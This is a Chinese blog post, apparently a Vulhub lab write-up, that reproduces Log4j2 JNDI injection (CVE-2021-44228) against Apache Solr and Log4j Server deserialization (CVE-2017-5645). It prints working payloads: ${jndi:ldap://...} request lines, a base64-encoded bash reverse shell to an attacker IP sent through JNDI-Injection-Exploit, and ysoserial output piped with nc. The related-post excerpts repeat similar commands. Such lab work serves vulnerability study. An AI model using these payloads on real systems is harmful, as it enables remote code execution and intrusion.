Vulhub——Log4j、solr

原创 已于 2024-06-21 10:31:48 修改 · 1.4k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#log4j

于 2024-06-17 17:31:24 首次发布

文章目录

一、Log4j

1.1 Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j2是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。

Apache Log4j2不是一个特定的Web服务,而仅仅是一个第三方库,我们可以通过找到一些使用了这个库的应用来复现这个漏洞,比如Apache Solr。使用dokcer启动一个Apache Solr 8.11.0,其依赖了Log4j 2.14.1

判断是否存在漏洞

发送数据包:

GET /solr/admin/cores?action=${
   
   jndi:ldap://4paxg6.dnslog.cn} HTTP/1.1
Host: 192.168.92.6:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

在这里插入图片描述
在这里插入图片描述

获取反弹shell

bash -i >& /dev/tcp/192.168.92.6/4444 0>&1 # 反弹shell命令
bash -c {
   
   echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjYvNDQ0NCAwPiYx}|{
   
   base64,-d}|{
   
   bash,-i} # 防止管道符失效
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjYvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A "10.111.X.X" # -A表示远程服务器的地址
  • JDNI注入的原理:被害主机远程请求搭建了LDAP、rmi服务的远程主机,为了远程加载类。一旦被害主机请求,就会在自己系统上执行反弹shell的命令。
  • 10.111.X.X:本机IP;
  • 192.168.92.6:kali IP。

在这里插入图片描述

所有链接均可实现JDNI注入,获取shell。

访问http://192.168.92.6:8983/solr/admin/cores?action=${jndi:rmi://10.111.11.119:1099/mrkfu0}

在这里插入图片描述

在这里插入图片描述

1.2 Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

使用ysoserial生成payload,然后直接发送给192.168.92.6:4712端口即可。

java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/testsuccess" | nc 192.168.92.6 4712
docker exec -it <container-id> /bin/bash # 进入shell

在这里插入图片描述
反弹shell

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3Rjc
最低0.47元/天 解锁文章

200万优质内容无限畅学
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558)
qq_51577576的博客
12-09 971
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558) Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
vulhub环境)[CVE-2021-44228]:log4j2漏洞复现流程详解
m0_62670778的博客
04-27 1391
下载对应的jar包。将jar包拷贝到kali虚拟机,或者直接在kali中下载。构造payload:这是一条bash反弹shell。将payload进行base64编码。
vulhublog4j
追风少年亚索的博客
11-18 1420
免责声明: 本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
利用Vulhub复现log4j漏洞
god_001的博客
04-27 4424
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose build sudo docker-compose up -d 网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action
log4j2漏洞攻略
最新发布
2401_84023613的博客
07-23 150
6.拿取JDK1.8并构造Payload且直接访问。2.上传参数并在DNSLog.cn查看。7.用whoami命令查看权限。3.反弹shell并加密。1.启动靶场并进入网站。4.构造PayLoad。5.监听8899端口。
vulhub-Solr
Mccc_li的博客
08-09 347
文章目录Apache Solr 远程命令执行漏洞(CVE-2017-12629)使用postCommit测试使用newSearcher测试Apache solr XML 实体注入漏洞(CVE-2017-12629) Apache Solr 远程命令执行漏洞(CVE-2017-12629) 使用postCommit测试 1.第一次命令执行我们需要创建一个listener GET /solr/demo/config HTTP/1.1 Host: 192.168.100.129:8983 User-Agent:
Vulhub靶场-Log4j2
weixin_69010236的博客
01-24 1399
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua} 当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
利用Vulhub复现log4j漏洞CVE-2021-44228
plant1234的博客
10-02 870
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测。接下来要实现反弹shell,可以用命令。
vulhub靶场log4j2漏洞复现
A2893992091的博客
09-08 447
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号:CVE-2021-44228。
VulhubLog4j[漏洞复现]
如有错误感谢斧正
12-10 1124
说一下,除了使用vulhub的docker镜像搭建环境外,我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer:`java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`,无需使用vulhub和编写代码。Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。
Vulhub漏洞复现---solr---CVE-2019-17558
weixin_74942037的博客
11-16 1124
Velocity模板可以通过configset ’ Velocity / '目录中的Velocity模板或作为参数提供。用户定义的configset可以包含可呈现的、潜在的恶意模板。参数提供的模板在默认情况下是禁用的,但是可以通过设置params.resource.loader来启用。定义响应编写器需要配置API访问。Solr 8.4完全删除了params资源加载器,只有在configset是“可信的”(由经过身份验证的用户上传)时才启用configset提供的模板呈现。配置未打开,无法使用自定义模板。
Apache Log4j代码执行漏洞(CVE-2021-44228)
weixin_45808483的博客
12-14 8141
前言: 12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。 Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。 Log4j 是目前全球使用最广泛的 java 日志框架之一。该漏洞还影响着很多全球使用量前列的开源组件,如 Apache Struts2、
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1247
vulhub复现cve-2021-44228 log4j漏洞
vulhublog4j
haoaaao的博客
05-02 1378
0x00 CVE-2017-5645(反序列化) 1、介绍 ApacheLog4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 2、搭建 docker 3、复现 使用ysoserial生成payload,然后发送给your-ip:4712端口 java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-..
VULHUB复现log4j反序列化漏洞-CVE-2021-44228
carrot11223的博客
04-29 1297
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
log4j漏洞复现--vulhub
ccc_9wy的博客
12-08 1776
log4j漏洞复现;CVE-2021-44228 RCE漏洞;CVE-2017-5645 反序列化漏洞;JNDI;vulhub靶场;详细复现过程,带payload。
Solr 使用 Log4j
weixin_30869099的博客
01-30 393
大家知道在解压开solr的web程序(apache-solr-3.2.0.war)时,在其WEB-INF/lib目录下有slf4j- api-1.5.5.jar,slf4j-jdk14-1.5.5.jar这两个jar包,故可知其默认使用的是jdk的日志数据,其日志都是输入到 tomcat的logs中;再看其是结合slf4j进行jdk的日志数据;slf4j并不是一种具体的日志系统,而是一个用户日志系...
【vluhub】log4j注入漏洞 CVE-2021-44228
yh
07-23 1311
log4j漏洞复现,vulhub搭建
vulhub/log4j2漏洞复现
02-09
### 复现Log4j2漏洞的过程 #### 漏洞概述 Apache Log4j 2.x <= 2.14.1 和 Log4j 2.15.0-rc1 版本存在严重的远程代码执行漏洞,编号为CVE-2021-44228[^2]。 #### 准备工作 为了复现此漏洞,需先准备好Docker环境并安装vulhub漏洞靶场。具体操作如下: 确保已成功安装Docker容器服务[^1]。 从GitHub仓库克隆最新的vulhub项目到本地机器上: ```bash git clone https://github.com/vulhub/vulhub.git ``` 切换至对应的漏洞案例文件夹内,在这里以`log4j2/CVE-2021-44228`为例: ```bash cd vulhub/log4j2/CVE-2021-44228/ ``` 按照官方说明文档中的指引来启动所需的Docker镜像和服务实例: ```bash docker-compose up -d ``` 此时应该能够正常访问部署好的Solr应用界面 `http://<靶场IP>:8983/solr/#/`。 #### 测试与验证 构建恶意请求字符串用于检测目标系统是否受到该漏洞的影响。可以借助工具如yakit自动生成有效的DNS回调地址,或者手动创建一个可控的域名供后续实验使用[^4]。 尝试向Solr管理接口发送包含特殊构造参数的动作指令,例如查看核心配置信息时附加`${jndi:ldap://${sys:java.version}.example.com}`形式的数据片段作为查询条件的一部分: ```bash curl 'http://<靶场IP>:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com}' ``` 如果一切顺利的话,则会在指定的日志记录位置观察到来自受控服务器发出的相关网络连接活动,证明确实触发了JNDI注入行为。 #### 攻击模拟 对于更深入的研究目的而言,还可以进一步设置监听程序等待来自受害主机发起反连Shell请求。这通常涉及到运行专门设计用来配合此类场景下的Java应用程序——比如welk1n开发维护的那个开源项目`JNDI-Injection-Exploit`[^3]。 在攻击者控制的工作站上面编译打包好上述提到的应用软件包之后,就可以依据实际情况调整命令行选项来进行定制化的载荷投递动作了。下面给出了一条可能用到的实际样例语句[^5]: ```bash java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar \ -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNy4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" \ -A "<攻击机IP>" ``` 请注意替换其中涉及的具体数值部分以便适应不同的测试环境需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值